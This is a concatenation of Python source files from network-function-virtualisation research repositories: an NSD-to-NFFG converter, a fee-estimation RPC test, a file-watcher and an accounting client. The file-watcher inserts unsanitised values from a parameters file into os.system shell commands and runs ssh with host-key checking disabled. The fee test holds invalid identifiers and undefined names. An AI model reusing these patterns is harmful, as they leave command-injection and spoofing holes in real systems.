# nffg = generate_simple_test_topo()
# nffg = generate_simple_test_req()
# nffg = generate_mn_topo2()
# nffg = generate_mn_test_req2()
# nffg = generate_mn_req_hackathon()
# nffg = generate_hwloc2nffg_test_req()
# nffg = generate_5gex_req1()
# nffg = generate_etsi_req1b()
# nffg = generate_etsi_req4b2b_robot1()
# nffg = generate_etsi_req_robot1_simple()
# nffg = generate_mn_topo_etsi()
# nffg = generate_req_verification()
# nffg = generate_sssa_req1()
# nffg = generate_ietf_req()
nffg = generate_verification_req()
# pprint(nffg.network.__dict__)
# nffg.merge_duplicated_links()
# pprint(nffg.network.__dict__)
print nffg.dump()
# print generate_merged_mapped()
``` |
{
"source": "5GExchange/tnova_connector",
"score": 2
} |
#### File: tnova_connector/conversion/converter.py
```python
import argparse
import json
import logging
import os
import pprint
import re
import sys
from nffg_lib.nffg import NFFG
from nsd_wrapper import NSWrapper
from util.colored_logger import ColoredLogger
from vnf_catalogue import VNFCatalogue, MissingVNFDException
class TNOVAConverter(object):
"""
Converter class for NSD --> NFFG conversion.
"""
LOGGER_NAME = "TNOVAConverter"
# DEFAULT_SAP_PORT_ID = None # None = generated an UUID by defaults
DEFAULT_SAP_PORT_ID = 1
DEFAULT_PLACEMENT_SUBNET = "Automatic"
ANTIAFFINITY_CONSTRAINT = "antiaffinity"
def __init__ (self, logger=None, vnf_catalogue=None):
"""
Constructor.
:param logger: optional logger
"""
if logger is not None:
self.log = logger.getChild(self.LOGGER_NAME)
# self.log.name = self.LOGGER_NAME
else:
logging.getLogger(self.__class__.__name__)
if vnf_catalogue is not None:
self.__catalogue = vnf_catalogue
else:
self.__catalogue = VNFCatalogue(logger=logger)
self.vlan_register = {}
def __str__ (self):
return "%s()" % self.__class__.__name__
def initialize (self):
"""
Initialize TNOVAConverter by reading cached VNFDs from file.
:return: None
"""
self.log.info("Initialize %s..." % self.__class__.__name__)
self.log.debug("Use VNFCatalogue: %s" % self.__catalogue)
def parse_nsd_from_file (self, nsd_file):
"""
Parse the given NFD as :any`NSWrapper` from file given by nsd_file.
nsd_path can be relative to $PWD.
:param nsd_file: NSD file path
:type nsd_file: str
:return: parsed NSD
:rtype: NSWrapper
"""
try:
with open(os.path.abspath(nsd_file)) as f:
return json.load(f, object_hook=self.__nsd_object_hook)
except IOError as e:
self.log.error("Got error during NSD parse: %s" % e)
sys.exit(1)
@classmethod
def parse_nsd_from_text (cls, raw):
"""
Parse the given NFD as :any`NSWrapper` from raw data.
:param raw: raw NSD data
:type raw: str
:return: parsed NSD
:rtype: NSWrapper
"""
return json.load(raw, object_hook=cls.__nsd_object_hook)
@staticmethod
def __nsd_object_hook (obj):
"""
Object hook function for converting top dict into :any:`NSWrapper`
instance.
"""
return NSWrapper(raw=obj['nsd']) if 'nsd' in obj else obj
def __convert_nfs (self, nffg, ns, vnfs):
"""
Create NF nodes in given NFFG based on given NF and VNFs.
:param nffg: main NFFG object
:type nffg: NFFG
:param ns: NSD wrapper object
:type ns: NSWrapper
:param vnfs: VNF catalogue
:type vnfs: VNFCatalogue
:return: None
"""
# Add NFs
for domain, nf_id, num in ns.get_vnf_instances():
vnf = vnfs.get_by_id(nf_id)
if vnf is None:
self.log.error(
"VNFD with id: %s is not found in the VNFCatalogue!" % nf_id)
raise MissingVNFDException(nf_id)
# Forge NF id to be unique within an NFFG
base_id = vnf.get_vnf_name()
self.log.debug('Found VNF with id: %s --> %s' % (nf_id, base_id))
if num is not None:
base_id = "%s_%s" % (base_id, num)
node_nf = nffg.add_nf(id=base_id,
name=vnf.name,
func_type=vnf.get_vnf_type(),
dep_type=vnf.get_deployment_type(),
**vnf.get_resources())
self.log.debug("Create VNF: %s" % node_nf)
node_nf.add_metadata("store_id", nf_id)
# Add ports to NF
for port, data in vnf.get_ports():
nf_port = node_nf.add_port(id=port)
self.log.debug("Added NF port: %s" % nf_port)
if 'sap' in data:
nf_port.sap = data['sap']
self.log.debug("Added sap: %s" % nf_port.sap)
if 'technology' in data:
nf_port.technology = data['technology']
self.log.debug("Added technology: %s" % nf_port.technology)
if 'role' in data:
nf_port.role = data['role']
self.log.debug("Added role: %s" % nf_port.role)
if 'mac' in data:
nf_port.l2 = data['mac']
self.log.debug("Added l2 address: %s" % nf_port.l2)
if 'ip' in data:
nf_port.l3.add_l3address(id=data['ip'], configure=True,
requested=data['ip'])
self.log.debug("Added l3 address: %s" % data['ip'])
# Detect INTERNET ports
for iport in vnf.get_internet_ports():
if iport not in node_nf.ports:
# INTERNET port is not external
nf_port = node_nf.add_port(id=iport, sap="INTERNET")
self.log.debug("Added new INTERNET port: %s" % nf_port)
else:
nf_port = node_nf.ports[iport]
# Set SAP attribute for INTERNET port
nf_port.sap = "INTERNET"
# Add metadata
for md, value in vnf.get_metadata().iteritems():
if md == 'bootstrap_script':
node_nf.add_metadata(name='command', value=value)
self.log.debug("Found command: %s", value)
elif md == 'vm_image':
node_nf.add_metadata(name='image', value=value)
self.log.debug("Found image: %s", value)
elif md == 'variables':
node_nf.add_metadata(name='environment',
value=self._parse_variables(value=value))
self.log.debug("Found environment: %s",
node_nf.metadata['environment'])
elif md == 'networking_resources':
# Add port bindings
for iport in vnf.get_internet_ports():
port = node_nf.ports[iport]
port.l4 = self._parse_port_bindings(value=value)
self.log.debug("Added port bindings: %s" % port.l4)
# Add IP assignments
ips = self._parse_ip_address_binding(value=value)
self.log.debug("Detected IP assignments: %s" % ips)
regular_ports = vnf.get_non_internet_ports()
if len(regular_ports) < len(ips):
self.log.warning("Detected more IP address: %s for assignment "
"then available ports: %s!" % (ips, regular_ports))
for i, ip in enumerate(ips):
port_id = regular_ports[i]
bound_port = node_nf.ports[port_id]
bound_port.l3.add_l3address(id=ip, configure=True, requested=ip)
self.log.debug("Added IP assignment: port: %s --> %s" % (i, ip))
self.log.info("Added NF: %s" % node_nf)
@staticmethod
def _parse_variables (value):
envs = {}
envs.update(map(lambda x: x.split('=', 1) if '=' in x else (x, None),
[str(kv) for kv in value.split()]))
return str(envs).replace('"', "'")
@staticmethod
def _parse_port_bindings (value):
ports = {}
splitted = []
for i in value.replace(',', ' ').split():
try:
splitted.append(int(i))
except ValueError:
pass
ports.update(map(lambda x: ("%s/tcp" % x, ('', x)), splitted))
return str(ports).replace('"', "'")
@staticmethod
def _parse_ip_address_binding (value):
ip_addresses = []
for i in value.replace(',', ' ').split():
if len(i.split('.')) == 4:
ip_addresses.append(i)
return ip_addresses
def __convert_saps (self, nffg, ns, vnfs):
"""
Create SAP nodes in given NFFG based on given NF and VNFs.
:param nffg: main NFFG object
:type nffg: NFFG
:param ns: NSD wrapper object
:type ns: NSWrapper
:param vnfs: VNF catalogue
:type vnfs: VNFCatalogue
:return: None
"""
# Add SAPs
for cp in ns.get_saps():
cp = cp.split(':')[0]
try:
sap_id = int(cp)
except ValueError:
sap_id = cp
if sap_id in nffg:
self.log.info("SAP: %s was already added, skip" % sap_id)
continue
node_sap = nffg.add_sap(id=sap_id,
name=sap_id)
self.log.info("Added SAP: %s" % node_sap)
# Add default port to SAP with random name
sap_port = node_sap.add_port(id=self.DEFAULT_SAP_PORT_ID)
self.log.info("Added SAP port: %s" % sap_port)
def __process_tag (self, abstract_id, ns_id):
"""
Generate a valid VLAN id from the raw_id data which derived from directly
an SG hop link id.
Moved from: escape.adapt.managers.InternalDomainManager#__process_tag
:param abstract_id: raw link id
:type abstract_id: str or int
:return: valid VLAN id
:rtype: int
"""
tag_id = "%s-%s" % (abstract_id, ns_id)
# Check if the abstract tag has already processed
if tag_id in self.vlan_register:
self.log.debug("Found already register TAG ID: %s ==> %s" % (
tag_id, self.vlan_register[tag_id]))
return self.vlan_register[tag_id]
# Check if the raw_id is a valid number
try:
vlan_id = int(tag_id)
# Check if the raw_id is free
if 0 < vlan_id < 4095 and vlan_id not in self.vlan_register.itervalues():
self.vlan_register[tag_id] = vlan_id
self.log.debug(
"Abstract ID a valid not-taken VLAN ID! Register %s ==> %s" % (
tag_id, vlan_id))
return vlan_id
except ValueError:
# Cant be converted to int, continue with raw_id processing
pass
trailer_num = re.search(r'\d+$', tag_id)
# If the raw_id ends with number
if trailer_num is not None:
# Check if the trailing number is a valid VLAN id (0 and 4095 are
# reserved)
trailer_num = int(trailer_num.group()) # Get matched data from Match obj
# Check if the VLAN candidate is free
if 0 < trailer_num < 4095 and \
trailer_num not in self.vlan_register.itervalues():
self.vlan_register[tag_id] = trailer_num
self.log.debug(
"Trailing number is a valid non-taken VLAN ID! Register %s ==> "
"%s..." % (tag_id, trailer_num))
return trailer_num
# else Try to find a free VLAN
else:
self.log.debug(
"Detected trailing number: %s is not a valid VLAN or already "
"taken!" % trailer_num)
# No valid VLAN number has found from tag_id, try to find a free VLAN
for vlan in xrange(1, 4094):
if vlan not in self.vlan_register.itervalues():
self.vlan_register[tag_id] = vlan
self.log.debug(
"Generated and registered VLAN id %s ==> %s" % (tag_id, vlan))
return vlan
# For loop is exhausted
else:
self.log.error("No available VLAN id found!")
return None
def __convert_sg_hops (self, nffg, ns, vnfs):
"""
Create SG hop edges in given NFFG based on given NF and VNFs.
:param nffg: main NFFG object
:type nffg: NFFG
:param ns: NSD wrapper object
:type ns: NSWrapper
:param vnfs: VNF catalogue
:type vnfs: VNFCatalogue
:return: None
"""
# Add SG hops
for vlink in ns.get_vlinks():
# Parse src params
src_node = vnfs.get_by_id(vlink['src_node'])
if src_node is not None:
src_node_id = src_node.get_vnf_name()
if vlink['src_node_num'] is not None:
src_node_id = "%s_%s" % (src_node_id, vlink['src_node_num'])
src_port_id = vlink['src_port']
src_port = nffg[src_node_id].ports[src_port_id]
# If the id is not VNF Catalogue, it must be a SAP
else:
src_port = nffg[vlink['src_node']].ports.container[0]
self.log.debug("Got src port: %s" % src_port)
# Parse dst params
dst_node = vnfs.get_by_id(vlink['dst_node'])
if dst_node is not None:
dst_node_id = dst_node.get_vnf_name()
if vlink['dst_node_num'] is not None:
dst_node_id = "%s_%s" % (dst_node_id, vlink['dst_node_num'])
dst_port_id = vlink['dst_port']
dst_port = nffg[dst_node_id].ports[dst_port_id]
# If the id is not VNF Catalogue, it must be a SAP
else:
dst_port = nffg[vlink['dst_node']].ports.container[0]
self.log.debug("Got dst port: %s" % dst_port)
# Generate SG link id compatible with ESCAPE's naming convention
link_id = self.__process_tag(vlink['id'], ns.id)
# Add SG hop
link_sg = nffg.add_sglink(id=link_id,
src_port=src_port,
dst_port=dst_port,
flowclass=vlink['flowclass'],
delay=vlink['delay'],
bandwidth=vlink['bandwidth'])
self.log.info("Added SG hop: %s" % link_sg)
self.log.debug("Managed Service hop IDs:\n%s"
% pprint.pformat(self.vlan_register))
def __convert_e2e_reqs (self, nffg, ns, vnfs):
"""
Create E2E Requirement edges in given NFFG based on given NF and VNFs.
:param nffg: main NFFG object
:type nffg: NFFG
:param ns: NSD wrapper object
:type ns: NSWrapper
:param vnfs: VNF catalogue
:type vnfs: VNFCatalogue
:return: None
"""
# Add e2e requirement links
# Get service chains from NFP.graph
reqs = ns.get_e2e_reqs()
# Get E2E requirements from SLAs
for chain in ns.get_nfps():
self.log.debug("Process chain: %s" % chain)
# Create set from SLA ids referred in vlinks in NFP graph list
req_id = {ns.get_vlink_sla_ref(id) for id in chain}
# Only one SLA (aka requirement) must be referred through a NFP
if len(req_id) < 1:
self.log.warning("No SLA id has detected in the NFP: %s! "
"Skip SLA processing..." % chain)
return
elif len(req_id) > 1:
self.log.error("Multiple SLA id: %s has detected in the NFP: %s! "
"Skip SLA processing..." % (req_id, chain))
return
else:
req_id = req_id.pop()
self.log.debug("Detected Requirement link ref: %s" % req_id)
if req_id not in reqs:
self.log.warning(
"SLA definition with id: %s was not found in detected SLAs: %s!" % (
req_id, reqs))
continue
src_node, src_node_num, src_port = ns.get_src_port(vlink_id=chain[0])
if src_node_num is not None:
src_node_id = "%s_%s" % (src_node, src_node_num)
else:
src_node_id = src_node_num
# If src_port is a valid port of a VNF
if src_port is not None:
try:
src_port = int(src_port)
except ValueError:
pass
src = nffg[src_node_id].ports[src_port]
# If src_node is a SAP but the default SAP port constant is set
elif self.DEFAULT_SAP_PORT_ID is not None:
src = nffg[src_node].ports[self.DEFAULT_SAP_PORT_ID]
# Else get the only port from SAP
else:
src = nffg[src_node].ports.container[0]
self.log.debug("Found src port object: %s" % src)
dst_node, dst_node_num, dst_port = ns.get_dst_port(vlink_id=chain[-1])
if dst_node_num is not None:
dst_node_id = "%s_%s" % (dst_node, dst_node_num)
else:
dst_node_id = dst_node_num
# If dst_port is a valid port of a VNF
if dst_port is not None:
try:
dst_port = int(dst_port)
except ValueError:
pass
dst = nffg[dst_node_id].ports[dst_port]
# If dst_node is a SAP but the default SAP port constant is set
elif self.DEFAULT_SAP_PORT_ID is not None:
dst = nffg[dst_node].ports[self.DEFAULT_SAP_PORT_ID]
# Else get the only port from SAP
else:
dst = nffg[dst_node].ports.container[0]
self.log.debug("Found dst port object: %s" % dst)
req_link = nffg.add_req(id=req_id,
src_port=src,
dst_port=dst,
delay=reqs[req_id]['delay'],
bandwidth=reqs[req_id]['bandwidth'],
sg_path=[int(id) for id in chain])
self.log.info("Added requirement link: %s" % req_link)
def convert (self, nsd_file):
"""
Main converter function which parse the VNFD and NSD filed, create the
VNF catalogue and convert the NSD given by nsd_file into :any:`NFFG`.
:param nsd_file: NSD field path
:type nsd_file: str
:return: created NFFG object
:rtype: :any:`NFFG`
"""
# Parse required descriptors
self.log.info("Parsing Network Service (NS) from NSD file: %s" % nsd_file)
ns = self.parse_nsd_from_file(nsd_file)
if not self.__catalogue.VNF_STORE_ENABLED:
self.log.info("Parsing new VNFs from VNFD files under: %s" %
self.__catalogue.VNF_CATALOGUE_DIR)
vnfs = self.__catalogue.parse_vnf_catalogue_from_folder()
self.log.debug("Registered VNFs: %s" % vnfs.get_registered_vnfs())
# Create main NFFG object
nffg = NFFG(id=ns.id, service_id=ns.id, name=ns.name)
# Convert NFFG elements
try:
self.log.debug("Convert NF nodes...")
self.__convert_nfs(nffg=nffg, ns=ns, vnfs=self.__catalogue)
self.log.debug("Convert SAP nodes...")
self.__convert_saps(nffg=nffg, ns=ns, vnfs=self.__catalogue)
self.log.debug("Convert Service Graph hop edges...")
self.__convert_sg_hops(nffg=nffg, ns=ns, vnfs=self.__catalogue)
self.log.debug("Convert E2E Requirement edges...")
self.__convert_e2e_reqs(nffg=nffg, ns=ns, vnfs=self.__catalogue)
self.log.debug("Extend request with optional translations...")
self.apply_extensions(nffg=nffg)
except MissingVNFDException as e:
self.log.error(e)
return None
except:
self.log.exception(
"Got unexpected exception during NSD -> NFFG conversion!")
return None
# Return with assembled NFFG
return nffg
def setup_placement_criteria (self, nffg, params):
"""
Setup customer SAP ids based on given `placement`.
:param nffg: service request
:type nffg: :class:`NFFG`
:param params: params dict received in HTTP request
:type params: dict
:return: None
"""
if 'placement' not in params:
self.log.warning("No placement was found in request params: %s" % params)
return
for i, placement in enumerate(params['placement']):
# placement format: <vnf_id>@<domain>-<num>
# VNF id format: <vnf_id>_<num>@<si_id>
if 'vnf' not in placement.keys() or 'subnet' not in placement.keys():
self.log.warning("Wrong placement criterion format: %s" % placement)
continue
if placement['subnet'] == self.DEFAULT_PLACEMENT_SUBNET:
self.log.debug("Detected default placement value: %s. "
"Skip consumer SAP id setup!" % placement['subnet'])
continue
self.log.debug("Searching NF node for VNF: %s..." % placement['vnf'])
vnf_id = placement['vnf'].split('@', 1)[0]
num = placement['vnf'].split('-')[-1]
try:
vnf_id = int(vnf_id)
except ValueError:
self.log.warning("Got VNF id: %s is not valid integer!" % vnf_id)
continue
converted_vnf_id = self.__catalogue.get_by_id(id=vnf_id).get_vnf_name()
base_nf_id = "%s_%s" % (converted_vnf_id, num)
self.log.debug("Found base NF name: %s" % base_nf_id)
nf = [nf for nf in nffg.nfs if str(nf.id).startswith(base_nf_id)]
if len(nf) != 1:
self.log.error("No unique NF was found for id: %s in %s"
% (base_nf_id, nf))
continue
nf = nf.pop()
self.log.debug("Found NF: %s" % nf)
nf_port = [p for p in nf.ports
if p.sap is not None and p.sap.startswith(
'INTERNET') and p.role != "consumer"]
if len(nf_port) > 1:
self.log.warning("Multiple INTERNET port was detected in NF: "
"%s --> %s" % (nf.id, nf_port))
elif len(nf_port) < 1:
self.log.warning("No INTERNET port was detected in NF: %s" % nf.id)
nf_port = [nf.add_port(id=placement['subnet'],
name="INTERNET")]
self.log.debug("Added arbitrary INTERNET port: %s" % nf_port)
else:
self.log.debug("Found INTERNET port: %s" % nf_port)
for port in nf_port:
if port.role is not None and port.role != "consumer":
self.log.warning("Found role: %s for port: %s! Skip overriding" %
(port.role, port))
continue
port.role = "consumer"
port.sap = placement['subnet']
self.log.debug("Update %s with consumer id: %s" % (port, port.sap))
def setup_metadata (self, nffg, params):
"""
Add metadata (k-v pairs) for VNF instances. Only antiaffinity is supported!
:param nffg: service request
:type nffg: :class:`NFFG`
:param params: params dict received in HTTP request
:type params: dict
:return: None
"""
if 'params' not in params:
self.log.warning("No extra data parameters were found in request: %s" %
params)
return
for i, metadata in enumerate(params['params']):
# instance: <vnf_id>@<domain>-<num> or uuid of the NS
# key: antiaffinity (currently only antiaffinity support)
# value: <vnf_id>@<domain>-<num>
# VNF id format: <vnf_id>_<num>_<si_id>
if metadata['key'] != self.ANTIAFFINITY_CONSTRAINT:
self.log.debug("Not supported metadata key: %s. Skip processing." %
metadata['key'])
continue
# Searching NF node
self.log.debug("Searching NF node for VNF: %s..." % metadata['instance'])
vnf_id = metadata['instance'].split('@', 1)[0]
num = metadata['instance'].split('-')[-1]
try:
vnf_id = int(vnf_id)
except ValueError:
self.log.warning("Got VNF id: %s is not valid integer!" % vnf_id)
continue
converted_vnf_id = self.__catalogue.get_by_id(id=vnf_id).get_vnf_name()
base_nf_id = "%s_%s" % (converted_vnf_id, num)
self.log.debug("Found base NF name: %s" % base_nf_id)
nf = [nf for nf in nffg.nfs if str(nf.id).startswith(base_nf_id)]
if len(nf) != 1:
self.log.error("No unique NF was found for id: %s in %s"
% (base_nf_id, nf))
continue
nf = nf.pop()
self.log.debug("Found NF: %s" % nf)
# Searching other NF node, target of antiaffinity constraint
self.log.debug("Searching target NF node of antiaffinity constraint "
"for VNF: %s..." % metadata['value'])
vnf_aaff_id = metadata['value'].split('@', 1)[0]
num_aaff = metadata['value'].split('-')[-1]
try:
vnf_aaff_id = int(vnf_aaff_id)
except ValueError:
self.log.warning("Got target VNF id: %s is not valid integer!"
% vnf_aaff_id)
continue
c_vnf_aaff_id = self.__catalogue.get_by_id(id=vnf_aaff_id).get_vnf_name()
base_nf_aaff_id = "%s_%s" % (c_vnf_aaff_id, num_aaff)
self.log.debug("Found target base NF name: %s" % base_nf_aaff_id)
nf_aaff = [n for n in nffg.nfs if str(n.id).startswith(base_nf_aaff_id)]
if len(nf_aaff) != 1:
self.log.error("No unique target NF was found for id: %s in %s"
% (base_nf_aaff_id, nf))
continue
nf_aaff = nf_aaff.pop()
self.log.debug("Found target NF: %s" % nf_aaff)
# Setup antiaffinity constraint
for j in range(1,10):
# Search next free id
if nf.constraints.has_antiaffinity(j):
continue
else:
nf.constraints.add_antiaffinity(j, str(nf_aaff.id))
self.log.debug("Antiaffinity constraint added "
"for NF: %s -- target NF: %s)" % (nf, nf_aaff))
break
else:
self.log.error("Max number of allowed antiafinity constraints exceeded"
"with NF: %s -- target NF: %s" % (nf, nf_aaff))
def apply_extensions (self, nffg):
"""
:param nffg:
:return:
"""
VCDN_ROLE_ID = "CACHE"
self.log.debug("Running vCDN port translations...")
nfs = [nf for nf in nffg.nfs]
for nf in nfs:
if nf.name.upper() == "VCDN_CACHE":
self.log.debug("Found vCDN NF: %s!" % nf.id)
if len(nf.ports) != 2:
self.log.warning("vCDN NF: %s should have exactly 2 ports not %s!"
% (nf.id, len(nf.ports)))
for port in nf.ports:
if port.sap is None and port.role is None:
self.log.debug("Detected non-SAP port: %s" % port.id)
port.sap = VCDN_ROLE_ID
port.role = "provider"
self.log.debug("Set provider SAP id: %s for NF: %s" % (port.sap,
nf.id))
# elif nf.functional_type.upper() == "FE2SAP":
# self.log.debug("Found fe2sap NF: %s" % nf.id)
# if len(nf.ports) != 2:
# self.log.error("Helper NF: %s should have exactly 2 ports not %s!"
# % (nf.id, len(nf.ports)))
# continue
# sap_port = [p for p in nf.ports][-1]
# sap_port.sap = VCDN_ROLE_ID
# sap_port.role = "consumer"
# self.log.debug("Set consumer SAP id: %s for NF: %s" % (sap_port.sap,
# nf.id))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="TNOVAConverter: Converting Network Services "
"from T-NOVA: NSD and VNFD files "
"into UNIFY: NFFG", add_help=True)
parser.add_argument("-c", "--catalogue", metavar="cdir",
default="vnf_catalogue",
help="path to the catalogue dir contains the VNFD files "
"(default: ./vnf_catalogue)")
parser.add_argument("-d", "--debug", action="store_const", dest="loglevel",
const=logging.DEBUG, default=logging.INFO,
help="run in debug mode")
parser.add_argument("-n", "--nsd", metavar="npath",
default="nsds/nsd_from_folder.json",
help="path of NSD file contains the Service Request "
"(default: ./nsds/nsd_from_folder.json)")
parser.add_argument("-o", "--offline", action="store_true", default=False,
help="work offline and read the VNFDs from files"
"(default: False)")
args = parser.parse_args()
# logging.setLoggerClass(ColoredLogger)
# logging.basicConfig(level=args.loglevel)
# log = logging.getLogger(__name__)
# log.setLevel(args.loglevel)
log = ColoredLogger.configure(level=args.loglevel)
catalogue = VNFCatalogue(use_remote=False, logger=log,
cache_dir=args.catalogue,
vnf_store_url="http://172.16.178.128:8080/NFS/vnfds")
# catalogue.VNF_STORE_ENABLED = True
catalogue.VNF_STORE_ENABLED = not args.offline
converter = TNOVAConverter(logger=log, vnf_catalogue=catalogue)
log.info("Start converting NS: %s..." % args.nsd)
nffg = converter.convert(nsd_file=args.nsd)
if nffg is not None:
log.info("Generated NFFG:\n%s" % nffg.dump())
``` |
{
"source": "5GL/5GL",
"score": 2
} |
#### File: qa/rpc-tests/smartfees.py
```python
from test_framework import 5GLTestFramework
from 5glrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
class EstimateFeeTest(5GLTestFramework):
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir,
["-debug=mempool", "-debug=estimatefee"]))
# Node1 mines small-but-not-tiny blocks, and allows free transactions.
# NOTE: the CreateNewBlock code starts counting block size at 1,000 bytes,
# so blockmaxsize of 2,000 is really just 1,000 bytes (room enough for
# 6 or 7 transactions)
self.nodes.append(start_node(1, self.options.tmpdir,
["-blockprioritysize=1500", "-blockmaxsize=2000",
"-debug=mempool", "-debug=estimatefee"]))
connect_nodes(self.nodes[1], 0)
# Node2 is a stingy miner, that
# produces very small blocks (room for only 3 or so transactions)
node2args = [ "-blockprioritysize=0", "-blockmaxsize=1500",
"-debug=mempool", "-debug=estimatefee"]
self.nodes.append(start_node(2, self.options.tmpdir, node2args))
connect_nodes(self.nodes[2], 0)
self.is_network_split = False
self.sync_all()
def run_test(self):
# Prime the memory pool with pairs of transactions
# (high-priority, random fee and zero-priority, random fee)
min_fee = Decimal("0.001")
fees_per_kb = [];
for i in range(12):
(txid, txhex, fee) = random_zeropri_transaction(self.nodes, Decimal("1.1"),
min_fee, min_fee, 20)
tx_kbytes = (len(txhex)/2)/1000.0
fees_per_kb.append(float(fee)/tx_kbytes)
# Mine blocks with node2 until the memory pool clears:
count_start = self.nodes[2].getblockcount()
while len(self.nodes[2].getrawmempool()) > 0:
self.nodes[2].setgenerate(True, 1)
self.sync_all()
all_estimates = [ self.nodes[0].estimatefee(i) for i in range(1,20) ]
print("Fee estimates, super-stingy miner: "+str([str(e) for e in all_estimates]))
# Estimates should be within the bounds of what transactions fees actually were:
delta = 1.0e-6 # account for rounding error
for e in filter(lambda x: x >= 0, all_estimates):
if float(e)+delta < min(fees_per_kb) or float(e)-delta > max(fees_per_kb):
raise AssertionError("Estimated fee (%f) out of range (%f,%f)"%(float(e), min_fee_kb, max_fee_kb))
# Generate transactions while mining 30 more blocks, this time with node1:
for i in range(30):
for j in range(random.randrange(6-4,6+4)):
(txid, txhex, fee) = random_transaction(self.nodes, Decimal("1.1"),
Decimal("0.0"), min_fee, 20)
tx_kbytes = (len(txhex)/2)/1000.0
fees_per_kb.append(float(fee)/tx_kbytes)
self.nodes[1].setgenerate(True, 1)
self.sync_all()
all_estimates = [ self.nodes[0].estimatefee(i) for i in range(1,20) ]
print("Fee estimates, more generous miner: "+str([ str(e) for e in all_estimates]))
for e in filter(lambda x: x >= 0, all_estimates):
if float(e)+delta < min(fees_per_kb) or float(e)-delta > max(fees_per_kb):
raise AssertionError("Estimated fee (%f) out of range (%f,%f)"%(float(e), min_fee_kb, max_fee_kb))
# Finish by mining a normal-sized block:
while len(self.nodes[0].getrawmempool()) > 0:
self.nodes[0].setgenerate(True, 1)
self.sync_all()
final_estimates = [ self.nodes[0].estimatefee(i) for i in range(1,20) ]
print("Final fee estimates: "+str([ str(e) for e in final_estimates]))
if __name__ == '__main__':
EstimateFeeTest().main()
``` |
{
"source": "5G-Measurement/PCC-Uspace",
"score": 2
} |
#### File: PCC-Uspace/pcc-gradient/filemonitor.py
```python
import sys
import time
import logging
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
import os
class NewSnapshotEventHandler(FileSystemEventHandler):
def __init__(self):
self.param = {}
self.param["Bandwidth"] = "100Mbit/s"
self.param["RTT"] = "30ms"
self.param["BufferSize"] = "50slots"
self.param["LossRate"] = "0"
self.is_start = False
def on_modified(self, event):
if event.is_directory is True:
return
with open("./parameters.txt", "r") as f:
param = f.read()
lines = param.split("\n")
tmp_param = {}
for line in lines:
if line == "stop" and self.is_start:
os.system("./stop_demo_compare_tcp_and_pcc.sh")
self.is_start = False
return
elif line == "start" and not self.is_start:
os.system("./run_demo_compare_tcp_and_pcc.sh")
self.is_start = True
elif line != "" and line !="start" and line != "stop":
tmp_param[line.split(" ")[0]] = line.split(" ")[1]
if tmp_param == self.param:
return
else:
self.param = tmp_param
if not self.is_start:
os.system("ssh -t -t -o StrictHostKeyChecking=no <EMAIL>@receiver1.demopair2.UIUCScheduling.emulab.net \"killall iperf && ./setup.bash {}\"".format(self.param["protocol"]))
os.system("ssh -t -t -o StrictHostKeyChecking=no <EMAIL>@receiver1.demopair2.UIUCScheduling.emulab.net \"nohup python ~/run_iperf.py &\"")
os.system("ssh -t -t -o StrictHostKeyChecking=no <EMAIL>[email protected] \"killall iperf && ./setup.bash {}\"".format(self.param["protocol"]))
os.system("python ./tune_bw_rtt_loss.py -b {} -d {} -q {} -l {}".format(self.param["Bandwidth"],
self.param["RTT"],
self.param["BufferSize"],
self.param["LossRate"]))
if __name__ == "__main__":
path = '.'
event_handler = NewSnapshotEventHandler()
observer = Observer()
observer.daemon = True
observer.schedule(event_handler, path, recursive=False)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
``` |
{
"source": "5g-media/accounting-agent",
"score": 3
} |
#### File: accounting-agent/accounting_client/accounting_client.py
```python
import json
import logging
from time import time
from rest_framework.status import HTTP_200_OK, HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN
from accounting_client.config import BASE_URL, ACCOUNTING_PASSWORD, ACCOUNTING_USERNAME, AUTH_URL, CLOSE_SESSIONS
from httpclient.client import Client
logger = logging.getLogger(__name__)
class AccountingClient(object):
"""Accounting Client Class.
This class serves as a wrapper for the Accounting/Billing services of 5G-MEDIA project,
as they are deployed in ENG's cloud. The methods implemented in this class are intended
for logging in to the services and opening/closing of NS, VNF and VDU sessions.
"""
__instance = None
def __init__(self):
"""Accounting Client Class Constructor."""
self.__client = Client(verify_ssl_cert=True)
self.__headers = {'Content-Type': 'application/json'}
self.login()
# Singleton Class
def __new__(cls):
if cls.__instance is not None:
return cls.__instance
else:
cls.__instance = super(AccountingClient, cls).__new__(cls)
return cls.__instance
def login(self):
"""Login to the Accounting/Billing Service."""
payload = {
'username': ACCOUNTING_USERNAME,
'password': <PASSWORD>
}
response = self.__client.post(url=AUTH_URL, headers=self.__headers, payload=json.dumps(payload))
if response.status_code == HTTP_200_OK:
self.__headers['Authorization'] = 'Bearer {}'.format(json.loads(response.text)['id_token'])
logger.info('Successfully logged on the accounting service')
def available_user_resource_list(self):
"""Get the available user resource list.
Returns:
user_resource_obj (object): A user resource list as a requests objects
"""
url = BASE_URL + '/availableUserResourceList'
response = self.__client.get(url=url, headers=self.__headers)
if response.status_code == HTTP_200_OK:
return response
return None
def open_session_retrial(self, url, payload):
"""Retry opening a session after the authorization token has expired.
Args:
url (str): The url for the session opening request
payload (dict): The essential data to post for session opening
Returns:
session_id (int): The ID of the session that was opened
"""
self.login()
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
if response.status_code == HTTP_200_OK:
session_id = int(response.text)
logger.info('Opened session with id {}'.format(session_id))
return session_id
def open_ns_session(self, ns):
"""Open a Network Service (NS) Session.
Args:
ns (obj): An NS Instance object
Returns:
ns_session_id (int): The ID of the opened NS session
"""
url = BASE_URL + '/openNsSession'
payload = {
'timestamp_sec': time(),
'catalog_tenant': ns.catalog_tenant,
'catalog_user': ns.catalog_user,
'mano_id': ns.mano_id,
'mano_project': ns.mano_project,
'mano_user': ns.mano_user,
'nfvipop_id': ns.nfvipop_id,
'ns_id': ns.uuid,
'ns_name': ns.name
}
logger.info('Attempting to open ns session with payload {}'.format(payload))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
logger.debug('Open ns session response: {}, Status code: {}'.format(response.text, response.status_code))
if response.status_code == HTTP_200_OK:
ns_session_id = int(response.text)
logger.info('Opened ns session with id {}'.format(ns_session_id))
return ns_session_id
